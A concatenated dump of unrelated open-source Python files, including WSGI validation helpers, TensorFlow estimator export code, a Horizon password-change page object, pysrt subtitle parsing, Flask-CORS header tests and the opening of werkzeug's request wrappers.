            "Names may not end in '-' or '_': %r" % name)
        bad_char = bad_header_value_re.search(value)
        if bad_char:
            assert_(0, "Bad header value: %r (bad char: %r)"
                % (value, bad_char.group(0)))
def check_content_type(status, headers):
    """Content-Type must be present iff the status code allows a body."""
    code = int(status.split(None, 1)[0])
    # @@: need one more person to verify this interpretation of RFC 2616
    # http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    NO_MESSAGE_BODY = (204, 304)
    body_allowed = code not in NO_MESSAGE_BODY
    for name, value in headers:
        if name.lower() != 'content-type':
            continue
        if body_allowed:
            return
        assert_(0, ("Content-Type header found in a %s response, "
                    "which must not return content.") % code)
    if body_allowed:
        assert_(0, "No Content-Type header found in headers (%s)" % headers)
def check_exc_info(exc_info):
    """``exc_info`` given to start_response must be None or a tuple."""
    valid = exc_info is None or type(exc_info) is type(())
    assert_(valid,
        "exc_info (%r) is not a tuple: %r" % (exc_info, type(exc_info)))
    # More exc_info checks?
def check_iterator(iterator):
    """Reject plain strings as application iterators."""
    # Technically a string is legal, which is why it's a really bad
    # idea, because it may cause the response to be returned
    # character-by-character
    assert_(not isinstance(iterator, str),
        "You should not return a string as your application iterator, "
        "instead return a single-item list containing that string.")
|
ville-k/tensorflow | refs/heads/master | tensorflow/contrib/learn/python/learn/utils/export.py | 48 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Export utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.framework import deprecated
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.session_bundle import exporter
from tensorflow.contrib.session_bundle import gc
from tensorflow.python.client import session as tf_session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import saver as tf_saver
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _get_first_op_from_collection(collection_name):
  """Return the first element of the named graph collection, or None."""
  elements = ops.get_collection(collection_name)
  # get_collection returns a (possibly empty) list; None and [] both mean
  # "nothing registered".
  if elements:
    return elements[0]
  return None
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _get_saver():
  """Lazily create (and register) the Saver used for exporting."""
  saver = _get_first_op_from_collection(ops.GraphKeys.SAVERS)
  if saver is not None:
    # NOTE(review): _get_first_op_from_collection already unwraps the
    # collection list, so this second [0] looks suspect -- confirm what the
    # SAVERS collection actually holds before changing it.
    saver = saver[0] if saver else None
  if saver is None and variables.global_variables():
    # Nothing registered yet: build a Saver and remember it for next time.
    saver = tf_saver.Saver()
    ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
  return saver
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _export_graph(graph, saver, checkpoint_path, export_dir,
                  default_graph_signature, named_graph_signatures,
                  exports_to_keep):
  """Exports graph via session_bundle, by creating a Session."""
  with graph.as_default():
    with tf_session.Session('') as session:
      # NOTE(review): these two calls only *create* initializer ops; they
      # are not run here.  The ops actually executed are the ones grouped
      # into init_op below -- confirm the two statements are intentional.
      variables.local_variables_initializer()
      lookup_ops.tables_initializer()
      # Restore the trained weights before exporting.
      saver.restore(session, checkpoint_path)
      export = exporter.Exporter(saver)
      export.init(
          init_op=control_flow_ops.group(
              variables.local_variables_initializer(),
              lookup_ops.tables_initializer()),
          default_graph_signature=default_graph_signature,
          named_graph_signatures=named_graph_signatures,
          assets_collection=ops.get_collection(ops.GraphKeys.ASSET_FILEPATHS))
      return export.export(export_dir, contrib_variables.get_global_step(),
                           session, exports_to_keep=exports_to_keep)
@deprecated('2017-03-25',
            'signature_fns are deprecated. For canned Estimators they are no '
            'longer needed. For custom Estimators, please return '
            'output_alternatives from your model_fn via ModelFnOps.')
def generic_signature_fn(examples, unused_features, predictions):
  """Creates generic signature from given examples and predictions.

  This is needed for backward compatibility with default behavior of
  export_estimator.

  Args:
    examples: `Tensor`.
    unused_features: `dict` of `Tensor`s.
    predictions: `Tensor` or `dict` of `Tensor`s.

  Returns:
    Tuple of default signature and empty named signatures.

  Raises:
    ValueError: If examples is `None`.
  """
  if examples is None:
    raise ValueError('examples cannot be None when using this signature fn.')

  tensors = {'inputs': examples}
  # A bare tensor is exported under the conventional 'outputs' key.
  if isinstance(predictions, dict):
    tensors.update(predictions)
  else:
    tensors['outputs'] = predictions
  return exporter.generic_signature(tensors), {}
@deprecated('2017-03-25',
            'signature_fns are deprecated. For canned Estimators they are no '
            'longer needed. For custom Estimators, please return '
            'output_alternatives from your model_fn via ModelFnOps.')
def classification_signature_fn(examples, unused_features, predictions):
  """Creates classification signature from given examples and predictions.

  Args:
    examples: `Tensor`.
    unused_features: `dict` of `Tensor`s.
    predictions: `Tensor` or dict of tensors that contains the classes tensor
      as in {'classes': `Tensor`}.

  Returns:
    Tuple of default classification signature and empty named signatures.

  Raises:
    ValueError: If examples is `None`.
  """
  if examples is None:
    raise ValueError('examples cannot be None when using this signature fn.')

  # Accept either a bare classes tensor or a dict holding one.
  classes = predictions['classes'] if isinstance(predictions, dict) \
      else predictions
  default_signature = exporter.classification_signature(
      examples, classes_tensor=classes)
  return default_signature, {}
@deprecated('2017-03-25',
            'signature_fns are deprecated. For canned Estimators they are no '
            'longer needed. For custom Estimators, please return '
            'output_alternatives from your model_fn via ModelFnOps.')
def classification_signature_fn_with_prob(
    examples, unused_features, predictions):
  """Builds a classification signature from predicted probabilities.

  Args:
    examples: `Tensor` of serialized input examples.
    unused_features: `dict` of `Tensor`s (ignored).
    predictions: `Tensor` of predicted probabilities, or a dict holding it
      under the 'probabilities' key.

  Returns:
    Tuple of the default classification signature and empty named signatures.

  Raises:
    ValueError: If `examples` is `None`.
  """
  if examples is None:
    raise ValueError('examples cannot be None when using this signature fn.')
  if isinstance(predictions, dict):
    scores = predictions['probabilities']
  else:
    scores = predictions
  signature = exporter.classification_signature(examples,
                                                scores_tensor=scores)
  return signature, {}
@deprecated('2017-03-25',
            'signature_fns are deprecated. For canned Estimators they are no '
            'longer needed. For custom Estimators, please return '
            'output_alternatives from your model_fn via ModelFnOps.')
def regression_signature_fn(examples, unused_features, predictions):
  """Builds a regression signature from the given examples and predictions.

  Args:
    examples: `Tensor` of serialized input examples.
    unused_features: `dict` of `Tensor`s (ignored).
    predictions: `Tensor` of regression outputs.

  Returns:
    Tuple of the default regression signature and empty named signatures.

  Raises:
    ValueError: If `examples` is `None`.
  """
  if examples is None:
    raise ValueError('examples cannot be None when using this signature fn.')
  signature = exporter.regression_signature(input_tensor=examples,
                                            output_tensor=predictions)
  return signature, {}
@deprecated('2017-03-25',
            'signature_fns are deprecated. For canned Estimators they are no '
            'longer needed. For custom Estimators, please return '
            'output_alternatives from your model_fn via ModelFnOps.')
def logistic_regression_signature_fn(examples, unused_features, predictions):
  """Builds a logistic-regression signature from predicted probabilities.

  Args:
    examples: `Tensor` of serialized input examples.
    unused_features: `dict` of `Tensor`s (ignored).
    predictions: `Tensor` of shape [batch_size, 2] of predicted
      probabilities, or a dict holding it under the 'probabilities' key.

  Returns:
    Tuple of the default regression signature (over P(Y=1|x)) and empty
    named signatures.

  Raises:
    ValueError: If `examples` is `None`.
  """
  if examples is None:
    raise ValueError('examples cannot be None when using this signature fn.')
  if isinstance(predictions, dict):
    probabilities = predictions['probabilities']
  else:
    probabilities = predictions
  # Column 0 is P(Y=0|x) and column 1 is P(Y=1|x); only the second column
  # is exported for inference, so the shape must be [batch_size, 2].
  shape = probabilities.get_shape()
  rank = len(shape)
  if rank != 2:
    logging.fatal(
        'Expected predictions to have rank 2, but received predictions with '
        'rank: {} and shape: {}'.format(rank, shape))
  if shape[1] != 2:
    logging.fatal(
        'Expected predictions to have 2nd dimension: 2, but received '
        'predictions with 2nd dimension: {} and shape: {}. Did you mean to use '
        'regression_signature_fn or classification_signature_fn_with_prob '
        'instead?'.format(shape[1], shape))
  signature = exporter.regression_signature(
      input_tensor=examples, output_tensor=probabilities[:, 1])
  return signature, {}
# pylint: disable=protected-access

@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _default_input_fn(estimator, examples):
  """Creates default input parsing using Estimator's feature signatures."""
  # Delegates to the estimator's (protected) example parser so the exported
  # graph parses tf.Examples exactly as the estimator was trained to.
  return estimator._get_feature_ops_from_example(examples)
@deprecated('2016-09-23', 'Please use Estimator.export_savedmodel() instead.')
def export_estimator(estimator,
                     export_dir,
                     signature_fn=None,
                     input_fn=_default_input_fn,
                     default_batch_size=1,
                     exports_to_keep=None):
  """Deprecated, please use Estimator.export_savedmodel()."""
  # Thin public wrapper: forwards to _export_estimator with the legacy
  # (deprecated) input_fn protocol enabled by default.
  # NOTE(review): the export path returned by _export_estimator is discarded
  # here -- confirm callers do not rely on a return value.
  _export_estimator(estimator=estimator,
                    export_dir=export_dir,
                    signature_fn=signature_fn,
                    input_fn=input_fn,
                    default_batch_size=default_batch_size,
                    exports_to_keep=exports_to_keep)
@deprecated('2017-03-25', 'Please use Estimator.export_savedmodel() instead.')
def _export_estimator(estimator,
                      export_dir,
                      signature_fn,
                      input_fn,
                      default_batch_size,
                      exports_to_keep,
                      input_feature_key=None,
                      use_deprecated_input_fn=True,
                      prediction_key=None,
                      checkpoint_path=None):
  """Builds an inference graph for `estimator` and exports it.

  Args:
    estimator: trained `Estimator` whose prediction graph is exported.
    export_dir: directory to export into.
    signature_fn: optional fn `(examples, features, predictions) ->
      (default_signature, named_signatures)`; takes priority over any
      signature fn the estimator itself provides.
    input_fn: serving-input fn; its calling convention depends on
      `use_deprecated_input_fn` (see below).
    default_batch_size: batch size of the serialized-example placeholder
      (deprecated input_fn mode only).
    exports_to_keep: if not None, how many export versions to keep.
    input_feature_key: key popped from `features` as the raw `examples`
      tensor (non-deprecated mode only).
    use_deprecated_input_fn: if True, call `input_fn(estimator, examples)`
      to map a string placeholder to features; otherwise call `input_fn()`
      which returns `(features, labels)`.
    prediction_key: if set, export only `predictions[prediction_key]`.
    checkpoint_path: checkpoint to export; defaults to the estimator's
      latest checkpoint.

  Returns:
    The export path returned by `_export_graph`.

  Raises:
    ValueError: if no input_fn is available, or neither features nor
      examples are defined.
  """
  if use_deprecated_input_fn:
    input_fn = input_fn or _default_input_fn
  elif input_fn is None:
    raise ValueError('input_fn must be defined.')

  # If checkpoint_path is specified, use the specified checkpoint path.
  checkpoint_path = (checkpoint_path or
                     tf_saver.latest_checkpoint(estimator._model_dir))

  with ops.Graph().as_default() as g:
    contrib_variables.create_global_step(g)

    if use_deprecated_input_fn:
      # Legacy mode: a single string placeholder of serialized tf.Examples.
      examples = array_ops.placeholder(dtype=dtypes.string,
                                       shape=[default_batch_size],
                                       name='input_example_tensor')
      features = input_fn(estimator, examples)
    else:
      features, _ = input_fn()
      examples = None
      if input_feature_key is not None:
        # The popped tensor serves as the signature's raw input.
        examples = features.pop(input_feature_key)

    if (not features) and (examples is None):
      raise ValueError('Either features or examples must be defined.')

    predictions = estimator._get_predict_ops(features).predictions

    if prediction_key is not None:
      predictions = predictions[prediction_key]

    # Explicit signature_fn takes priority
    if signature_fn:
      default_signature, named_graph_signatures = signature_fn(examples,
                                                               features,
                                                               predictions)
    else:
      try:
        # Some estimators provide a signature function.
        # TODO(zakaria): check if the estimator has this function,
        #   raise helpful error if not
        signature_fn = estimator._create_signature_fn()

        default_signature, named_graph_signatures = (
            signature_fn(examples, features, predictions))
      except AttributeError:
        # Estimator has no signature fn of its own: warn and fall back to
        # the generic signature.
        logging.warn(
            'Change warning: `signature_fn` will be required after'
            '2016-08-01.\n'
            'Using generic signatures for now. To maintain this behavior, '
            'pass:\n'
            '  signature_fn=export.generic_signature_fn\n'
            'Also consider passing a regression or classification signature; '
            'see cl/126430915 for an example.')
        default_signature, named_graph_signatures = generic_signature_fn(
            examples, features, predictions)

    if exports_to_keep is not None:
      exports_to_keep = gc.largest_export_versions(exports_to_keep)

    return _export_graph(
        g,
        _get_saver(),
        checkpoint_path,
        export_dir,
        default_graph_signature=default_signature,
        named_graph_signatures=named_graph_signatures,
        exports_to_keep=exports_to_keep)
# pylint: enable=protected-access
|
394954369/horizon | refs/heads/master | openstack_dashboard/test/integration_tests/pages/changepasswordpage.py | 13 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages import pageobject
class ChangePasswordPage(basepage.BasePage):
    """Page object for the dashboard's 'Change Password' settings page."""

    @property
    def modal(self):
        # A fresh wrapper per access; the elements themselves are looked up
        # lazily by the modal's properties.
        return ChangePasswordPage.ChangePasswordModal(self.driver,
                                                      self.conf)

    def change_password(self, current, new):
        """Fill the password form with *current*/*new* and submit it."""
        self.fill_field_element(
            current, self.modal.current_password)
        self.fill_field_element(
            new, self.modal.new_password)
        self.fill_field_element(
            new, self.modal.confirm_new_password)
        self.modal.click_on_change_button()

    def reset_to_default_password(self, current):
        """Restore the configured default password for the logged-in user."""
        # Admin and regular users have different default passwords in the
        # test configuration.
        if self.topbar.user.text == self.conf.identity.admin_username:
            return self.change_password(current,
                                        self.conf.identity.admin_password)
        else:
            return self.change_password(current,
                                        self.conf.identity.password)

    class ChangePasswordModal(pageobject.PageObject):
        # CSS locators for the modal's form fields and its submit button.
        _current_password_locator = (by.By.CSS_SELECTOR,
                                     'input#id_current_password')
        _new_password_locator = (by.By.CSS_SELECTOR,
                                 'input#id_new_password')
        _confirm_new_password_locator = (by.By.CSS_SELECTOR,
                                         'input#id_confirm_password')
        _change_submit_button_locator = (by.By.CSS_SELECTOR,
                                         'div.modal-footer button.btn')

        @property
        def current_password(self):
            return self.get_element(*self._current_password_locator)

        @property
        def new_password(self):
            return self.get_element(*self._new_password_locator)

        @property
        def confirm_new_password(self):
            return self.get_element(*self._confirm_new_password_locator)

        @property
        def change_button(self):
            return self.get_element(*self._change_submit_button_locator)

        def click_on_change_button(self):
            self.change_button.click()
|
mglukhikh/intellij-community | refs/heads/master | python/testData/psi/BlockWithoutColon.py | 80 | def foo():
while True
x = 1
x = 2
return x
|
BehavioralInsightsTeam/edx-platform | refs/heads/release-bit | openedx/core/djangoapps/content/course_overviews/migrations/0005_delete_courseoverviewgeneratedhistory.py | 80 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Drops the obsolete ``CourseOverviewGeneratedHistory`` model."""

    # Must run after the migration that added CourseOverview.org.
    dependencies = [
        ('course_overviews', '0004_courseoverview_org'),
    ]

    operations = [
        migrations.DeleteModel(
            name='CourseOverviewGeneratedHistory',
        ),
    ]
|
mihail-morosan/OCAPE | refs/heads/master | Utils/gcc/lib/gcc/mingw32/4.8.1/libstdc++.dll.a-gdb.py | 8 | # -*- python -*-
# Copyright (C) 2009-2013 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import gdb
import os
import os.path
# Install-time paths baked in by the GCC build.
pythondir = '/mingw/share/gcc-4.8.1/python'
libdir = '/mingw/lib/gcc/mingw32/4.8.1'

# This file might be loaded when there is no current objfile. This
# can happen if the user loads it manually. In this case we don't
# update sys.path; instead we just hope the user managed to do that
# beforehand.
if gdb.current_objfile () is not None:
    # Update module path. We want to find the relative path from libdir
    # to pythondir, and then we want to apply that relative path to the
    # directory holding the objfile with which this file is associated.
    # This preserves relocatability of the gcc tree.

    # Do a simple normalization that removes duplicate separators.
    pythondir = os.path.normpath (pythondir)
    libdir = os.path.normpath (libdir)
    prefix = os.path.commonprefix ([libdir, pythondir])
    # In some bizarre configuration we might have found a match in the
    # middle of a directory name.
    # NOTE(review): this check uses '/' while the ".." computation below
    # uses os.sep; both appear in MinGW paths -- confirm before changing.
    if prefix[-1] != '/':
        prefix = os.path.dirname (prefix) + '/'

    # Strip off the prefix.
    pythondir = pythondir[len (prefix):]
    libdir = libdir[len (prefix):]

    # Compute the ".."s needed to get from libdir to the prefix.
    dotdots = ('..' + os.sep) * len (libdir.split (os.sep))

    objfile = gdb.current_objfile ().filename
    dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)

    if not dir_ in sys.path:
        sys.path.insert(0, dir_)

# Load the pretty-printers.
from libstdcxx.v6.printers import register_libstdcxx_printers
register_libstdcxx_printers (gdb.current_objfile ())
|
cytec/SickRage | refs/heads/master | lib/pysrt/srtitem.py | 73 | # -*- coding: utf-8 -*-
"""
SubRip's subtitle parser
"""
from pysrt.srtexc import InvalidItem, InvalidIndex
from pysrt.srttime import SubRipTime
from pysrt.comparablemixin import ComparableMixin
from pysrt.compat import str, is_py2
import re
class SubRipItem(ComparableMixin):
    """
    SubRipItem(index, start, end, text, position)

    index -> int: index of item in file. 0 by default.
    start, end -> SubRipTime or coercible.
    text -> unicode: text content for item.
    position -> unicode: raw srt/vtt "display coordinates" string
    """
    # Serialization template: index, start --> end[ position], text, blank.
    ITEM_PATTERN = str('%s\n%s --> %s%s\n%s\n')
    TIMESTAMP_SEPARATOR = '-->'

    def __init__(self, index=0, start=None, end=None, text='', position=''):
        try:
            self.index = int(index)
        except (TypeError, ValueError): # try to cast as int, but it's not mandatory
            self.index = index

        # `or 0` also coerces a None start/end to time zero.
        self.start = SubRipTime.coerce(start or 0)
        self.end = SubRipTime.coerce(end or 0)
        self.position = str(position)
        self.text = str(text)

    @property
    def duration(self):
        # SubRipTime subtraction yields another SubRipTime.
        return self.end - self.start

    @property
    def text_without_tags(self):
        # Strips HTML-like markup tags (e.g. <i>, <b>) from the text.
        RE_TAG = re.compile(r'<[^>]*?>')
        return RE_TAG.sub('', self.text)

    @property
    def characters_per_second(self):
        # Newlines are not displayed characters, so they are excluded.
        characters_count = len(self.text_without_tags.replace('\n', ''))
        try:
            # duration.ordinal is the duration in milliseconds.
            return characters_count / (self.duration.ordinal / 1000.0)
        except ZeroDivisionError:
            return 0.0

    def __str__(self):
        # Position is only emitted when it is non-blank, preceded by a space.
        position = ' %s' % self.position if self.position.strip() else ''
        return self.ITEM_PATTERN % (self.index, self.start, self.end,
                                    position, self.text)
    if is_py2:
        # On Python 2 the method above becomes __unicode__, and plain str()
        # is deliberately disabled to avoid implicit byte-string coercion.
        __unicode__ = __str__

        def __str__(self):
            raise NotImplementedError('Use unicode() instead!')

    def _cmpkey(self):
        # ComparableMixin orders items by (start, end).
        return (self.start, self.end)

    def shift(self, *args, **kwargs):
        """
        shift(hours, minutes, seconds, milliseconds, ratio)

        Add given values to start and end attributes.
        All arguments are optional and have a default value of 0.
        """
        self.start.shift(*args, **kwargs)
        self.end.shift(*args, **kwargs)

    @classmethod
    def from_string(cls, source):
        # keepends=True so from_lines sees the original line structure.
        return cls.from_lines(source.splitlines(True))

    @classmethod
    def from_lines(cls, lines):
        if len(lines) < 2:
            raise InvalidItem()
        lines = [l.rstrip() for l in lines]
        index = None
        # The index line is optional: its absence is detected by the
        # timestamp separator appearing on the first line instead.
        if cls.TIMESTAMP_SEPARATOR not in lines[0]:
            index = lines.pop(0)
        start, end, position = cls.split_timestamps(lines[0])
        body = '\n'.join(lines[1:])
        return cls(index, start, end, body, position)

    @classmethod
    def split_timestamps(cls, line):
        timestamps = line.split(cls.TIMESTAMP_SEPARATOR)
        if len(timestamps) != 2:
            raise InvalidItem()
        start, end_and_position = timestamps
        # Anything after the first space following the end time is the raw
        # "display coordinates" position string.
        end_and_position = end_and_position.lstrip().split(' ', 1)
        end = end_and_position[0]
        position = end_and_position[1] if len(end_and_position) > 1 else ''
        return (s.strip() for s in (start, end, position))
|
holmberd/three.js | refs/heads/master | utils/exporters/blender/tests/scripts/exporter.py | 295 | import os
import argparse
import sys
import io_three
from io_three.exporter import constants
# Locate the '--' separator Blender inserts before script arguments.
# Bug fix: list.index raises ValueError (not IndexError) when the value is
# absent, so the original `except IndexError` branch was unreachable and a
# missing '--' crashed with a traceback instead of the intended message.
try:
    separator = sys.argv.index('--')
except ValueError:
    print('ERROR: no parameters specified')
    sys.exit(1)
def parse_args():
    """Parse the exporter options from the argv segment after '--'.

    Boolean export options become store_true flags; every other option
    takes a typed value with its default from EXPORT_OPTIONS.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('filepath')
    for option, default in constants.EXPORT_OPTIONS.items():
        if isinstance(default, bool):
            parser.add_argument('--%s' % option, action='store_true')
        else:
            parser.add_argument('--%s' % option,
                                type=type(default), default=default)
    return vars(parser.parse_args(sys.argv[separator+1:]))
def main():
    """Parse CLI options and run the three.js scene or geometry export."""
    args = parse_args()
    # Force precision handling and indented (human-readable) JSON output
    # regardless of the flags passed on the command line.
    args[constants.ENABLE_PRECISION] = True
    args[constants.INDENT] = True

    if args[constants.SCENE]:
        io_three.exporter.export_scene(args['filepath'], args)
    else:
        io_three.exporter.export_geometry(args['filepath'], args)

if __name__ == '__main__':
    main()
|
aleksandra-tarkowska/django | refs/heads/master | django/core/cache/utils.py | 121 | from __future__ import unicode_literals
import hashlib
from django.utils.encoding import force_bytes
from django.utils.http import urlquote
TEMPLATE_FRAGMENT_KEY_TEMPLATE = 'template.cache.%s.%s'
def make_template_fragment_key(fragment_name, vary_on=None):
    """Build the cache key for a ``{% cache %}`` template fragment.

    The vary-on values are URL-quoted, joined with ':' and MD5-hashed so
    the resulting key is safe for any cache backend.
    """
    vary_parts = () if vary_on is None else vary_on
    joined = ':'.join(urlquote(part) for part in vary_parts)
    digest = hashlib.md5(force_bytes(joined)).hexdigest()
    return TEMPLATE_FRAGMENT_KEY_TEMPLATE % (fragment_name, digest)
|
hoyjustin/ScopusAdapter | refs/heads/master | CorsTests/test_allow_headers.py | 1 | # -*- coding: utf-8 -*-
"""
test
~~~~
Flask-Cors tests module
"""
from tests.base_test import FlaskCorsTestCase, AppConfigTest
from flask import Flask
try:
# this is how you would normally import
from flask.ext.cors import *
except:
# support local usage without installed package
from flask_cors import *
class AllowHeadersTestCase(FlaskCorsTestCase):
    """Exercises the allow_headers (and legacy headers) decorator options."""

    def setUp(self):
        # Three routes: default options, explicit allow_headers, and the
        # pre-1.10.2 'headers' spelling of the same option.
        self.app = Flask(__name__)

        @self.app.route('/test_default')
        @cross_origin()
        def test_default():
            return 'Welcome!'

        @self.app.route('/test_override')
        @cross_origin(allow_headers=['X-Example-Header-B', 'X-Example-Header-A'])
        def test_override():
            return 'Welcome!'

        @self.app.route('/test_backwards_compatible')
        @cross_origin(headers=['X-Example-Header-B', 'X-Example-Header-A'])
        def test_list():
            return 'Welcome!'

    def test_default(self):
        # With no option set, no Access-Control-Allow-Headers is emitted.
        for resp in self.iter_responses('/test_default'):
            self.assertTrue(resp.headers.get(ACL_ALLOW_HEADERS) is None,
                            "Default should have no allowed headers")

    def test_override(self):
        '''
        If there is an Access-Control-Request-Method header in the request
        and Access-Control-Request-Method is allowed for cross origin
        requests and request method is OPTIONS,
        the Access-Control-Allow-Headers header should be echoed back.
        '''
        resp = self.preflight('/test_override')
        # Note: headers come back sorted, not in declaration order.
        self.assertEqual(resp.headers.get(ACL_ALLOW_HEADERS), 'X-Example-Header-A, X-Example-Header-B')

    def test_backwards_compatible(self):
        '''
        Version 1.10.2 changed the name of the parameter from 'headers'
        to 'allow_headers'
        '''
        resp = self.preflight('/test_backwards_compatible')
        self.assertEqual(resp.headers.get(ACL_ALLOW_HEADERS),
                         'X-Example-Header-A, X-Example-Header-B')

        # Non-preflight verbs must not carry the header.
        for resp in self.iter_responses('/test_backwards_compatible',
                                        verbs=['HEAD', 'GET']):
            self.assertTrue(resp.headers.get(ACL_ALLOW_HEADERS) is None)
class AppConfigAllowHeadersTestCase(AppConfigTest, AllowHeadersTestCase):
    """Re-runs AllowHeadersTestCase with options supplied via app.config."""

    def __init__(self, *args, **kwargs):
        super(AppConfigAllowHeadersTestCase, self).__init__(*args, **kwargs)

    def test_default(self):
        @self.app.route('/test_default')
        @cross_origin()
        def test_default():
            return 'Welcome!'

        super(AppConfigAllowHeadersTestCase, self).test_default()

    def test_override(self):
        # The decorator picks up CORS_ALLOW_HEADERS from the app config.
        self.app.config['CORS_ALLOW_HEADERS'] = ['X-Example-Header-B',
                                                 'X-Example-Header-A']

        @self.app.route('/test_override')
        @cross_origin()
        def test_list():
            return 'Welcome!'

        super(AppConfigAllowHeadersTestCase, self).test_override()

    def test_backwards_compatible(self):
        '''
        Version 1.10.2 changed the name of the parameter from 'headers'
        to 'allow_headers'
        '''
        # The legacy config key spelling is CORS_HEADERS.
        self.app.config['CORS_HEADERS'] = ['X-Example-Header-B',
                                           'X-Example-Header-A']

        @self.app.route('/test_backwards_compatible')
        @cross_origin()
        def test_list():
            return 'Welcome!'

        super(AppConfigAllowHeadersTestCase, self).test_backwards_compatible()
if __name__ == "__main__":
    # Bug fix: `unittest` was referenced without ever being imported in this
    # module, so running the file directly raised NameError. Import locally
    # to keep the module's import-time behavior unchanged.
    import unittest
    unittest.main()
mboeru/maraschino | refs/heads/master | lib/werkzeug/wrappers.py | 85 | # -*- coding: utf-8 -*-
"""
werkzeug.wrappers
~~~~~~~~~~~~~~~~~
The wrappers are simple request and response objects which you can
subclass to do whatever you want them to do. The request object contains
the information transmitted by the client (webbrowser) and the response
object contains all the information sent back to the browser.
An important detail is that the request object is created with the WSGI
environ and will act as high-level proxy whereas the response object is an
actual WSGI application.
Like everything else in Werkzeug these objects will work correctly with
unicode data. Incoming form data parsed by the response object will be
decoded into an unicode object if possible and if it makes sense.
:copyright: (c) 2011 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import urlparse
from datetime import datetime, timedelta
from werkzeug.http import HTTP_STATUS_CODES, \
parse_accept_header, parse_cache_control_header, parse_etags, \
parse_date, generate_etag, is_resource_modified, unquote_etag, \
quote_etag, parse_set_header, parse_authorization_header, \
parse_www_authenticate_header, remove_entity_headers, \
parse_options_header, dump_options_header, http_date, \
parse_if_range_header, parse_cookie, dump_cookie, \
parse_range_header, parse_content_range_header, dump_header
from werkzeug.urls import url_decode, iri_to_uri
from werkzeug.formparser import FormDataParser, default_stream_factory
from werkzeug.utils import cached_property, environ_property, \
header_property, get_content_type
from werkzeug.wsgi import get_current_url, get_host, LimitedStream, \
ClosingIterator
from werkzeug.datastructures import MultiDict, CombinedMultiDict, Headers, \
EnvironHeaders, ImmutableMultiDict, ImmutableTypeConversionDict, \
ImmutableList, MIMEAccept, CharsetAccept, LanguageAccept, \
ResponseCacheControl, RequestCacheControl, CallbackDict, \
ContentRange
from werkzeug._internal import _empty_stream, _decode_unicode, \
_patch_wrapper, _get_environ
def _run_wsgi_app(*args):
    """This function replaces itself to ensure that the test module is not
    imported unless required.  DO NOT USE!
    """
    global _run_wsgi_app
    # First call only: import the real implementation, rebind the
    # module-level name to it (so subsequent calls skip this function and
    # the import entirely), then delegate this call to it.
    from werkzeug.test import run_wsgi_app as _run_wsgi_app
    return _run_wsgi_app(*args)
def _warn_if_string(iterable):
    """Helper for the response objects to check if the iterable returned
    to the WSGI server is not a string.
    """
    # Strings are iterable, so WSGI would send them one character at a time;
    # warn with the caller's stack frame so the culprit line is reported.
    if not isinstance(iterable, basestring):
        return
    from warnings import warn
    warn(Warning('response iterable was set to a string. This appears '
                 'to work but means that the server will send the '
                 'data to the client char, by char. This is almost '
                 'never intended behavior, use response.data to assign '
                 'strings to the response object.'), stacklevel=2)
class BaseRequest(object):
"""Very basic request object. This does not implement advanced stuff like
entity tag parsing or cache controls. The request object is created with
the WSGI environment as first argument and will add itself to the WSGI
environment as ``'werkzeug.request'`` unless it's created with
`populate_request` set to False.
There are a couple of mixins available that add additional functionality
to the request object, there is also a class called `Request` which
subclasses `BaseRequest` and all the important mixins.
It's a good idea to create a custom subclass of the :class:`BaseRequest`
and add missing functionality either via mixins or direct implementation.
Here an example for such subclasses::
from werkzeug.wrappers import BaseRequest, ETagRequestMixin
class Request(BaseRequest, ETagRequestMixin):
pass
Request objects are **read only**. As of 0.5 modifications are not
allowed in any place. Unlike the lower level parsing functions the
request object will use immutable objects everywhere possible.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Per default the request object will be added to the WSGI
environment as `werkzeug.request` to support the debugging system.
If you don't want that, set `populate_request` to `False`.
If `shallow` is `True` the environment is initialized as shallow
object around the environ. Every operation that would modify the
environ in any way (such as consuming form data) raises an exception
unless the `shallow` attribute is explicitly set to `False`. This
is useful for middlewares where you don't want to consume the form
data by accident. A shallow request is not populated to the WSGI
environment.
.. versionchanged:: 0.5
